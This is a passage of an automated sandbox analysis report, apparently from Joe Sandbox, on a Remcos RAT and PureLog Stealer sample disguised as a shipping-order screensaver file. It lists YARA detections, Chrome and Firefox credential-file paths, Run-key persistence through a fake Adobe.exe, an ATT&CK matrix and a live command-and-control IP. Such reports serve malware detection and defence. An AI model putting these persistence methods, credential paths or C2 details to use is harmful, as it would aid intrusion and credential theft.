                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\ProgramData\Adobe\Adobe.exe VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\ProgramData\Adobe\Adobe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00434010
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041A7A2 GetUserNameW,3_2_0041A7A2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,3_2_0044800F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.2dee2b0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Adobe.exe.250dcf4.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2064810127.00000000024EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040B335
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: \key3.db3_2_0040B335

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.70f0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.2dee2b0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Adobe.exe.250dcf4.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2064810127.00000000024EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: cmd.exe3_2_00405042

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Bypass User Account Control                    		1
                    Deobfuscate/Decode Files or Information                    		111
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol111
                    Input Capture                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Access Token Manipulation                    		3
                    Obfuscated Files or Information                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Windows Service                    		2
                    Software Packing                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script22
                    Process Injection                    		1
                    Timestomp                    		LSA Secrets33
                    System Information Discovery                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		Cached Domain Credentials121
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Bypass User Account Control                    		DCSync31
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Masquerading                    		Proc Filesystem3
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd22
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564895 Sample: #U4f73#U5ddd#U7acb 20241202... Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 44 geoplugin.net 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 14 other signatures 2->56 9 #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe 3 2->9         started        12 Adobe.exe 2 2->12         started        14 Adobe.exe 2 2->14         started        16 Adobe.exe 2 2->16         started        signatures3 process4 file5 42 #U4f73#U5ddd#U7acb...x20' SO.scr.exe.log, ASCII 9->42 dropped 18 #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe 2 4 9->18         started        22 Adobe.exe 12->22         started        24 Adobe.exe 14->24         started        26 Adobe.exe 16->26         started        process6 file7 38 C:\ProgramData\Adobe\Adobe.exe, PE32 18->38 dropped 40 C:\ProgramData\...\Adobe.exe:Zone.Identifier, ASCII 18->40 dropped 58 Creates autostart registry keys with suspicious names 18->58 60 Drops executable to a common third party application directory 18->60 28 Adobe.exe 3 18->28         started        signatures8 process9 signatures10 62 Multi AV Scanner detection for dropped file 28->62 64 Machine Learning detection for dropped file 28->64 31 Adobe.exe 3 14 28->31         started        34 Adobe.exe 28->34         started        36 Adobe.exe 28->36         started        process11 dnsIp12 46 104.250.180.178, 49707, 7902 M247GB United States 31->46 48 geoplugin.net 178.237.33.50, 49709, 80 ATOM86-ASATOM86NL Netherlands 31->48

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe66%ReversingLabsWin32.Trojan.Remcos
                    #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\Adobe\Adobe.exe100%Joe Sandbox ML
                    C:\ProgramData\Adobe\Adobe.exe66%ReversingLabsWin32.Trojan.Remcos

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gp$Adobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://geoplugin.net/json.gp/C#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://geoplugin.net/json.gplAdobe.exe, 00000007.00000002.4507004110.0000000000E6F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://geoplugin.net/json.gpSystem32Adobe.exe, 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.250.180.178
                                		unknownUnited States
                                		9009M247GBtrue
                                178.237.33.50
                                		geoplugin.netNetherlands
                                		8455ATOM86-ASATOM86NLfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1564895
                                Start date and time:2024-11-29 00:00:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 38s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:16
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                renamed because original name is a hash value
                                Original Sample Name: 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@20/5@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 99
                                • Number of non-executed functions: 194
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                00:01:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WN "C:\ProgramData\Adobe\Adobe.exe"
                                00:01:09AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WN "C:\ProgramData\Adobe\Adobe.exe"
                                00:01:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Adobe_Nov-3XE9WN "C:\ProgramData\Adobe\Adobe.exe"
                                18:00:57API Interceptor2x Sleep call for process: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe modified
                                18:00:58API Interceptor4401588x Sleep call for process: Adobe.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.250.180.178Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                  CI-PL- HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    Doc089776867565357609 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exeGet hashmaliciousRemcosBrowse
                                      PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exeGet hashmaliciousXWormBrowse
                                        rSOD219ISF-____.scr.exeGet hashmaliciousRemcosBrowse
                                          rWWTLCLtoUSADCL.scr.exeGet hashmaliciousXWormBrowse
                                            ttCOg61bOg.exeGet hashmaliciousRemcosBrowse
                                              SKM_C364e24092511300346565787689900142344656767788755634232343456768953334466870.scr.exeGet hashmaliciousRemcosBrowse
                                                ISF #U8a02#U8259#U55ae - KHH-TOLEDO(VIA NYC) SO6615#U21928152 WKH2406122.scr.exeGet hashmaliciousXWormBrowse
                                                  ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exeGet hashmaliciousRemcosBrowse
                                                    178.237.33.50PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • geoplugin.net/json.gp
                                                    Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                    • geoplugin.net/json.gp
                                                    Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • geoplugin.net/json.gp
                                                    rem.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • geoplugin.net/json.gp
                                                    Salary Revision _pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp
                                                    BUNKER INVOICE #U2018MV.SUN OCEAN.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    geoplugin.netPO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                    • 178.237.33.50
                                                    17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 178.237.33.50
                                                    Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                    • 178.237.33.50
                                                    Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 178.237.33.50
                                                    rem.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                    • 178.237.33.50
                                                    Salary Revision _pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    BUNKER INVOICE #U2018MV.SUN OCEAN.pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    M247GBLM94OE0VNK.exeGet hashmaliciousUnknownBrowse
                                                    • 91.202.233.141
                                                    Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                    • 104.250.180.178
                                                    CI-PL- HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                    • 104.250.180.178
                                                    loligang.x86-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                    • 38.95.109.118
                                                    nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 38.206.86.187
                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                    • 45.74.38.161
                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                    • 77.36.125.131
                                                    akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                    • 154.17.91.183
                                                    Mail-Manager.jarGet hashmaliciousUnknownBrowse
                                                    • 184.174.97.32
                                                    nklsh4.elfGet hashmaliciousUnknownBrowse
